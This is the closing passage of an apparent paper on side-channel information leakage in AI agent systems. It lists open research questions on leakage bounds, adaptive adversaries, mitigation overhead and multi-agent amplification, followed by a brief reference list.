1. **Formal analysis**: can bounds on information leakage be proven formally for a given agent configuration?
2. **Adaptive adversaries**: as mitigations are deployed, attackers will find new channels. How do defenders stay ahead?
3. **Overhead budget**: what performance overhead is acceptable for side-channel mitigation?
4. **Multi-agent amplification**: do side channels compose in multi-agent systems, leaking more than in the single-agent case?

## 10. References

- Debenedetti et al. "Defeating Prompt Injections by Design." arXiv:2503.18813, 2025.
- Anderson, Stajano, and Lee. "Security Policies." Advances in Computers, 2002.
- Glukhov et al. "Breach By A Thousand Leaks: Unsafe Information Leakage in 'Safe' AI Responses." ICLR, 2025.
- Carlini and Wagner. "ROP Is Still Dangerous: Breaking Modern Defenses." USENIX Security, 2014.